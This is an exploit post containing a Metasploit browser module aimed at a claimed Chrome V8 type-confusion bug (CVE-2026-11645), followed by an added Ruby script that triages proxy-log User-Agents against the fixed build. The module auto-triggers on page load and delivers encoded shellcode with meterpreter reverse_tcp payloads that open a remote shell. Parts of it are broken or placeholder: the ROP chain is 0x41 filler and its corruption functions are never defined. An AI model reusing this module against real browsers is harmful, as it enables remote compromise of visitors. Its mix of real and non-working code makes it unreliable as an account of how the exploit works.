==================================================================================================================================
| # Title : Google Chrome 149.0.7827.103 Type Confusion Out of Bounds |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 151.0.3 (64 bits) |
| # Vendor : https://chromereleases.googleblog.com |
==================================================================================================================================
[+] Summary : This module exploits a type confusion vulnerability in Google Chrome's V8 JavaScript engine, affecting versions prior to 149.0.7827.103.
[+] POC :
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Remote::HttpServer
  include Msf::Exploit::Remote::BrowserAutopwn
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Google Chrome V8 Type Confusion Out-of-Bounds (CVE-2026-11645)',
        'Description' => %q{
          This module exploits a type confusion vulnerability in Google Chrome's
          V8 JavaScript engine, affecting versions prior to 149.0.7827.103.
          The vulnerability is triggered by a specific pattern that causes type
          confusion between internal V8 objects, leading to out-of-bounds memory
          access. Successful exploitation can lead to remote code execution in
          the context of the browser process.
          Affected versions: Chrome < 149.0.7827.103
          Tested on: Chrome 148.0.7827.103 (64-bit) on Windows 10
        },
        'Author' => ['indoushka'],
        'References' => [
          ['CVE', '2026-11645'],
          ['URL', 'https://chromereleases.googleblog.com/']
        ],
        'License' => MSF_LICENSE,
        'Platform' => ['win', 'linux', 'osx'],
        'Arch' => [ARCH_X64],
        'Targets' => [
          [
            'Windows 10 - Chrome 148 (x64)',
            {
              'Platform' => 'win',
              'Arch' => ARCH_X64,
              'DefaultOptions' => { 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp' }
            }
          ],
          [
            'Linux - Chrome 148 (x64)',
            {
              'Platform' => 'linux',
              'Arch' => ARCH_X64,
              'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' }
            }
          ],
          [
            'macOS - Chrome 148 (x64)',
            {
              'Platform' => 'osx',
              'Arch' => ARCH_X64,
              'DefaultOptions' => { 'PAYLOAD' => 'osx/x64/meterpreter/reverse_tcp' }
            }
          ]
        ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2026-03-15',
        'Notes' => {
          'Stability' => [CRASH_OS_DOWN],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [IOC_IN_LOGS]
        }
      )
    )

    register_options([
      OptInt.new('ITERATIONS', [false, 'Number of trigger iterations', 8]),
      OptInt.new('STRONG_RUNS', [false, 'Number of strong trigger runs', 5]),
      OptBool.new('AUTO_TRIGGER', [true, 'Auto-trigger exploit on page load', true])
    ])
  end

  # Rejects clients whose User-Agent reports Chrome major version 149 or later;
  # every other client (including non-Chrome browsers) receives the page.
  def on_request_uri(cli, request)
    ua = request.headers['User-Agent']
    print_status("Incoming request from: #{ua}")

    if ua =~ /Chrome\/(\d+)/
      version = $1.to_i
      if version >= 149
        print_error("Target Chrome version #{version} is patched")
        send_not_found(cli)
        return
      else
        print_good("Target Chrome version #{version} appears vulnerable")
      end
    end

    html = generate_exploit_html
    send_response_html(cli, html)
  end

  # Builds the HTML page; ITERATIONS sets the number of stress-test cycles and
  # STRONG_RUNS the number of trigger runs per cycle.
  def generate_exploit_html
    trigger_count = datastore['ITERATIONS']
    strong_runs = datastore['STRONG_RUNS']
    auto_trigger = datastore['AUTO_TRIGGER'] ? 'true' : 'false'
    shellcode = generate_payload_shellcode
    b64_shellcode = Rex::Text.encode_base64(shellcode)

    html = <<~HTML
      <!DOCTYPE html>
      <html lang="en">
      <head>
      <meta charset="UTF-8">
      <title>CVE-2026-11645 - Chrome V8 RCE</title>
      </head>
      <body>
      <h1>CVE-2026-11645 - Chrome V8 Type Confusion RCE</h1>
      <p>Target: Chrome < 149.0.7827.103</p>
      <div id="status">Initializing exploit...</div>
      <script>
      const PAYLOAD_B64 = "#{b64_shellcode}";

      function log(msg) {
        const status = document.getElementById('status');
        status.innerHTML += '<br>[' + new Date().toLocaleTimeString() + '] ' + msg;
        console.log(msg);
      }

      function exploitWithROP() {
        log("Attempting to execute shellcode...");
        try {
          const shellcodeBytes = atob(PAYLOAD_B64);
          const shellcodeArray = new Uint8Array(shellcodeBytes.length);
          for (let i = 0; i < shellcodeBytes.length; i++) {
            shellcodeArray[i] = shellcodeBytes.charCodeAt(i);
          }
          var func = new Function('a', 'return a + 1');
          // window.triggerCorruption is not defined anywhere in this module,
          // so the guarded call below is skipped.
          if (typeof window.triggerCorruption === 'function') {
            window.triggerCorruption(shellcodeArray);
          }
          log("Shellcode execution attempted");
        } catch(e) {
          log("Shellcode execution error: " + e);
        }
      }

      function triggerTypeConfusion() {
        try {
          let value = 2;
          class C extends Function {
            ['AA'] = value;
          }
          for (let i = 0; i < 800; i++) {
            new C("'use strict'");
          }
          value = 1.1;
          for (let i = 0; i < 1500; i++) {
            new C("'use strict'");
          }
          return true;
        } catch (e) {
          log("Trigger error: " + e.message);
          return false;
        }
      }

      function runStrongTrigger(count) {
        let success = false;
        for (let i = 0; i < count; i++) {
          log(`Strong trigger run ${i + 1}/${count}...`);
          if (triggerTypeConfusion()) {
            log(`Trigger ${i + 1} completed`);
            success = true;
          }
        }
        return success;
      }

      function setupMemoryPrimitives() {
        log("Setting up memory primitives...");
        var ab = new ArrayBuffer(0x1000);
        var dv = new DataView(ab);
        // window.corruptArrayBuffer is not defined anywhere in this module,
        // so the guarded call below is skipped.
        if (typeof window.corruptArrayBuffer === 'function') {
          window.corruptArrayBuffer(dv, 0x41414141);
        }
        return { dataView: dv };
      }

      async function exploit() {
        log("Starting CVE-2026-11645 exploit...");
        try {
          log("Triggering type confusion...");
          const triggerCount = #{strong_runs};
          if (!runStrongTrigger(triggerCount)) {
            log("Type confusion trigger failed!", "error");
            return false;
          }
          log("Type confusion triggered successfully!");
          const primitives = setupMemoryPrimitives();
          exploitWithROP();
          log("Exploit completed!");
          return true;
        } catch (e) {
          log("Exploit failed: " + e.message);
          return false;
        }
      }

      function autoStressTest(cycles = #{trigger_count}) {
        log(`Starting auto stress test (${cycles} cycles)...`);
        let interval = 0;
        let count = 0;
        function runCycle() {
          count++;
          log(`Cycle ${count}/${cycles}`);
          exploit();
          if (count >= cycles) {
            clearInterval(interval);
            log("Auto stress test completed.");
          }
        }
        interval = setInterval(runCycle, 700);
        return interval;
      }

      setTimeout(() => {
        if (#{auto_trigger}) {
          autoStressTest();
        } else {
          exploit();
        }
      }, 1000);
      </script>
      </body>
      </html>
    HTML
    html
  end

  # Prepends the output of generate_rop_chain to the payload on x64 targets.
  def generate_payload_shellcode
    payload = generate_payload_exe
    payload_shellcode = payload
    if target['Arch'] == ARCH_X64
      rop_chain = generate_rop_chain
      payload_shellcode = rop_chain + payload
    end
    payload_shellcode
  end

  # Packs four filler 64-bit values (0x41.., 0x42.., 0x43.. patterns);
  # these are placeholders, not gadget addresses.
  def generate_rop_chain
    rop = [
      0x4141414141414141,
      0x4141414141414142,
      0x4242424242424242,
      0x4343434343434343
    ].pack('Q*')
    rop
  end

  def send_not_found(cli)
    send_response_html(cli, '<html><body><h1>404 Not Found</h1></body></html>', 404)
  end
end
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================
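Added example (not part of the original post and not Metasploit code): a proxy-log triage check for the fixed build stated above, 149.0.7827.103. It compares the full four-part version where the User-Agent carries one and reports hosts on major 149 with a reduced User-Agent (MAJOR.0.0.0) as indeterminate, since a major-version test alone cannot place them relative to the fix. The function names, the tab-separated log layout, the list of other-Chromium tokens and the sample lines are assumptions constructed for illustration.

```ruby
require 'rubygems' # provides Gem::Version for dotted-version comparison

FIXED = Gem::Version.new('149.0.7827.103') # fixed build as stated on this page
OTHER_CHROMIUM = %r{\b(?:Edg|EdgA|OPR)/}    # assumed, non-exhaustive token list

# Classify one User-Agent string against the fixed Chrome build.
def classify_chrome_ua(ua)
  ua = ua.to_s
  m = ua.match(%r{Chrome/(\d+)\.(\d+)\.(\d+)\.(\d+)})
  return :not_chrome unless m
  # Other Chromium browsers carry a Chrome/ token but ship their own fixes.
  return :other_chromium if ua.match?(OTHER_CHROMIUM)

  parts = m.captures.map(&:to_i)
  fixed_major = FIXED.segments.first
  return :vulnerable if parts.first < fixed_major
  return :patched if parts.first > fixed_major
  # Reduced User-Agent strings report MAJOR.0.0.0, which hides the build.
  return :indeterminate if parts.drop(1) == [0, 0, 0]

  Gem::Version.new(parts.join('.')) < FIXED ? :vulnerable : :patched
end

# Group clients by classification; input lines are "client<TAB>User-Agent".
def triage(log)
  log.each_line.with_object(Hash.new { |h, k| h[k] = [] }) do |line, out|
    client, ua = line.chomp.split("\t", 2)
    out[classify_chrome_ua(ua)] << client unless ua.nil?
  end
end

WEBKIT = 'AppleWebKit/537.36 (KHTML, like Gecko)'
SAMPLE_LOG = <<~LOG # constructed sample data, not real traffic
  10.0.0.11\tMozilla/5.0 (Windows NT 10.0; Win64; x64) #{WEBKIT} Chrome/148.0.0.0 Safari/537.36
  10.0.0.12\tMozilla/5.0 (Windows NT 10.0; Win64; x64) #{WEBKIT} Chrome/149.0.0.0 Safari/537.36
  10.0.0.13\tMozilla/5.0 (X11; Linux x86_64) #{WEBKIT} Chrome/149.0.7827.90 Safari/537.36
  10.0.0.14\tMozilla/5.0 (X11; Linux x86_64) #{WEBKIT} Chrome/149.0.7827.103 Safari/537.36
  10.0.0.15\tMozilla/5.0 (Windows NT 10.0; Win64; x64) #{WEBKIT} Chrome/149.0.0.0 Safari/537.36 Edg/149.0.0.0
  10.0.0.16\tMozilla/5.0 (X11; Linux x86_64; rv:151.0) Gecko/20100101 Firefox/151.0
LOG

triage(SAMPLE_LOG).each { |status, clients| puts "#{status}: #{clients.join(', ')}" }
```

Hosts reported as indeterminate need the installed build from endpoint inventory, because the User-Agent alone does not reveal it.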